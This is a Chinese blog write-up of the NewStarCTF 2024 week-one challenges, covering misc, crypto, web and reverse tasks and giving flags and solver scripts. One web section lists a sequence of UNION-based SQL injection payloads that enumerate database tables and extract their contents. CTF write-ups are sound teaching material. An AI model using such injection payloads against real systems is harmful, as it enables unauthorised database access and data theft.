首页 > 其他分享 >NewStarCtf 2024第一周writeup

NewStarCtf 2024第一周writeup

时间:2024-10-08 12:22:31浏览次数:8  
标签:NewStarCtf union writeup midd bytes 2024 flag 操作 select

有几道题没写出来,但还是希望能够帮到大家理解更多的CTF知识

Signin

操作内容:做选择题得出flag。

flag值:

flag{I_Agr3e_to_FoL10w_th3_ru1es_c41fa97d}

MISC 兑换码

操作内容:

题目提示flag在图片下方,010修改图片宽度,得到flag。

flag值:

flag{La_vaguelette}

MISC Labyrinth

操作内容:

题目标有LSB,用工具找到flag。

flag值:

flag{e33bb7a1-ac94-4d15-8ff7-fd8c88547b43}

MISC WhereIsFlag

操作内容:

kali连接上去,ls挨个目录找的。

你们二次元真的……

flag值:

flag{0083b779-1f5b-4c01-be80-8123c9b05b64}

MISC pleasingMusic

操作内容:

听了下音频,有嘟嘟滴滴的声音,感觉是摩斯电码,题目又说正反都好听,所以把音频反向,获取摩斯电码为:./--../..--.-/--/---/.-./..././..--.-/-.-./---/-../.

flag值:

flag{ez_morse_code}

MISC decompress

操作内容:

逐层解压,最后有个文件和一个要解密的压缩包,文件打开是:^([a-z]){3}\d[a-z]$,感觉像是解压密码的正则,盲跑一下解压软件试试。密码是:xtr4m,打开之后好几个flag.zip文件,拿说的正确的flag试试:

flag值:

flag{U_R_th3_ma5ter_0f_dec0mpress}

Crypto Base

操作内容:

3d3d3d感觉是hex编码的=,所以hex解码。然后base32+base64。

flag值:

flag{B@sE_0f_CrYpt0_N0W}

Crypto Xor

操作内容:

异或。

from pwn import xor

from Crypto.Util.number import bytes_to_long,long_to_bytes

key = b'New_Star_CTF'

flag='flag{*******************}'

# flag[:13]:0-12位

m1 = bytes_to_long(bytes(flag[:13], encoding='utf-8'))

m2 = flag[13:]

k1=bytes_to_long(key)

c1= 8091799978721254458294926060841

m1=k1^c1

m1=long_to_bytes(m1)

print(m1)

#'flag{0ops!_yo'

c2= b';:\x1c1<\x03>*\x10\x11u;'

m2=xor(c2,key)

print(m2)

# b'u_know_XOR!}'

# flag{0ops!_you_know_XOR!}

flag值:

flag{0ops!_you_know_XOR!}

Crypto Strange King

操作内容:

看题目感觉是凯撒,但是单纯解密接不出来。

ksjr-->flag,感觉每个间隔分别是5 7 9 11,再结合题目中的每天进步一点,感觉非常合理,所以写代码跑一下。

cypto='ksjr{EcxvpdErSvcDgdgEzxqjql}'

a=5

le="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"

i=0

mes=[]

for i in cypto:

if(i in le):

raw_midd=(ord(i))

midd=chr(ord(i)-a)

if raw_midd<97:

if ord(midd)<65:

midd=chr(ord(midd)+26)

else:

if ord(midd)<97 :

midd=chr(ord(midd)+26)

mes.append(midd)

else :

midd=i

mes.append(midd)

a=(a+2)%26

print("".join(str(l) for l in mes))

解出来flag是:flag{PleaseDoNotStopLearing}。

flag值:

flag{PleaseDoNotStopLearing}

Crypto 一眼秒了

操作内容:

是rsa,从网站获取到n的分解,得到p,q。

from Crypto.Util.number import *

from gmpy2 import *

p = 7221289171488727827673517139597844534869368289455419695964957239047692699919030405800116133805855968123601433247022090070114331842771417566928809956044421

q = 7221289171488727827673517139597844534869368289455419695964957239047692699919030405800116133805855968123601433247022090070114331842771417566928809956045093

n=52147017298260357180329101776864095134806848020663558064141648200366079331962132411967917697877875277103045755972006084078559453777291403087575061382674872573336431876500128247133861957730154418461680506403680189755399752882558438393107151815794295272358955300914752523377417192504702798450787430403387076153

c=48757373363225981717076130816529380470563968650367175499612268073517990636849798038662283440350470812898424299904371831068541394247432423751879457624606194334196130444478878533092854342610288522236409554286954091860638388043037601371807379269588474814290382239910358697485110591812060488786552463208464541069

e = 65537

d = gmpy2.invert(e,(p-1)*(q-1))

m = pow(c,d,n)

m =long_to_bytes(m).decode('utf-8',errors='ignore')

print(m)

解出来flag是:flag{9cd4b35a-affc-422a-9862-58e1cc3ff8d2}。

flag值:

flag{9cd4b35a-affc-422a-9862-58e1cc3ff8d2}

Web headach3

操作内容:

打开网页看响应体,在响应头里。

flag值:

flag{You_Ar3_R3Ally_A_9ooD_d0ctor}

Web 会赢吗

操作内容:

  1. /3ntranc3查看页面源代码,获得flag第一部分:ZmxhZ3tXQTB3和/4cqu1siti0n;
  2. 猜想/4cqu1siti0n是另一个页面,打开。

查看页面源代码,尝试构造到/api/flag/4cqu1siti0n的post请求(这里是我猜的)。获得:

"flag":"IV95NF9yM2Fs","nextLevel":"s34l"

  1. /s34l:查看源代码,修改图示部分:

获得第三部分flag:MXlfR3I0c1B和下一阶段:/Ap3x

  1. 查看源代码感觉1部分是关键,要点击2 部分使其生效。<noscript>关闭浏览器的js选项:

获得flag:fSkpKcyF9,下一阶段是空。

(5)组合得到:ZmxhZ3tXQTB3IV95NF9yM2FsMXlfR3I0c1BfSkpKcyF9,base64解密得到flag。

flag值:

flag{WA0w!_y4_r3al1y_Gr4sP_JJJs!}

Web 谢谢皮蛋

操作内容:

看了下是sql注入:

5 union select 1,2#

5 union select database(),2#

5 union select 1,group_concat(table_name) from information_schema.tables where table_schema='ctf'#

5 union select 1,group_concat(column_name) from information_schema.columns where table_schema='ctf' and table_name='Fl4g'#

5 union select 1,group_concat(id) from ctf.Fl4g#

5 union select 1,group_concat(des) from ctf.Fl4g#

5 union select 1,group_concat(value) from ctf.Fl4g#

flag值:

flag{fe3abae7-9010-4fd5-81d5-fc7db01684f0}

Reverse begin

操作内容:

按照步骤操作即可:

flag值:

flag{Mak3_aN_3Ff0rt_tO_5eArcH_F0r_th3_f14g_C0Rpse}

来自:NewStarCtf 2024第一周writeup(部分) - 荔枝白 - 博客园

如果有不清晰或不明白的地方,欢迎大家评论区留言讨论。

如果有什么不对或者需要改正的地方,请多多指教!欢迎讨论交流!

标签:NewStarCtf,union,writeup,midd,bytes,2024,flag,操作,select
From: https://blog.csdn.net/2401_83582688/article/details/142754723

相关文章

  • 2024 Oct
    Question1.[Usaco2004Dec]FenceObstacleCourse给定\(n\)个栅栏,第\(i\)个栅栏的范围是\(([L_i,R_i],i)\),初始Bessie位于\((S,n+1)\)处,不能从中间跨过栅栏,但是端点处可以,问到达\((0,0)\)的横向移动距离最小值。\(n\leq5\times10^4,-10^5\leqL_i<R_i\leq10......
  • PhpStrom2024.1永久激活及激活过程中出现的问题
    PhpStrom2024.1及激活工具下载激活工具:https://www.alipan.com/s/Aj5EEMxgLZCPhpStrom:https://www.alipan.com/s/cx69krtGXaw PhpStrom安装与激活1、下载并根据提示安装PhpStrom2、下载激活工具并将文件夹放在常用位置(文件夹名称与文件夹路径不可有中文)3、打开scripts文件......
  • 2024-10-8
    X9MQ8ML8U7-eyJsaWNlbnNlSWQiOiJYOU1ROE1MOFU3IiwibGljZW5zZWVOYW1lIjoic2lnbnVwIHNjb3R0ZXIiLCJhc3NpZ25lZU5hbWUiOiIiLCJhc3NpZ25lZUVtYWlsIjoiIiwibGljZW5zZVJlc3RyaWN0aW9uIjoiIiwiY2hlY2tDb25jdXJyZW50VXNlIjpmYWxzZSwicHJvZHVjdHMiOlt7ImNvZGUiOiJJSSIsImZhbGxiYWNrRGF0......
  • 【2024-10-03】连岳摘抄
    23:59我生平最受用的有两句话:一是“责任心”,二是“趣味”。我自己常常力求这两句话之实现与调和,又常常把这两句话向我的朋友强聒不舍。今天所讲,敬业即是责任心,乐业即是趣味。我深信人类合理的生活应该如此,我望诸君和我一同受用!                ......
  • 【2024-10-04】连岳摘抄
    23:59人生价值是一个分数值,取之于社会为分母,反馈于社会为分子。每个人分数值高,加到一起,社会就进步快。                                                 ——田昭武8......
  • 【2024-10-02】连岳摘抄
    23:59为什么我的眼里常含泪水?因为我对这土地爱得深沉......                                                 ——艾青一、恭喜你及时回头,女性35岁,婚育还来得及,再迟......
  • 【2024-10-01】连岳摘抄
    23:59大雨落幽燕,白浪滔天。秦皇岛外打鱼船。一片汪洋都不见,知向谁边?往事越千年,魏武挥鞭,东临碣石有遗篇。萧瑟秋风今又是,换了人间。                                             ......
  • 【一句日历】2024年10月
    【2023年10月1日·星期二】大雨落幽燕,白浪滔天。秦皇岛外打鱼船。一片汪洋都不见,知向谁边?往事越千年,魏武挥鞭,东临碣石有遗篇。萧瑟秋风今又是,换了人间。                                       ......
  • 2024 闽盾杯-黑盾赛道WP
    CRYPTO签到题-学会SMhttps://www.json.cn/encrypt/sm3题目要求小写所以需要转换一下或者脚本:importhashlibmessage="heidun2024"hash_object=hashlib.new('sm3')hash_object.update(message.encode('utf-8'))hash_value=hash_object.hexdigest()print(hash_val......
  • 2024 第七届“巅峰极客”网络安全技能挑战赛初赛 wp
    WEBEncirclingGame题目描述:Asimplegame,enjoyitandgettheflagwhenyoucompleteit.开题,前端小游戏,红点出不去就行直接玩通关了看看如何不玩也能拿到flag,flag存储在后端php文件内,前端找不到。看一下游戏的请求包,里面记录了红点的最后位置和防火墙(黑点)的位置。那么我们伪......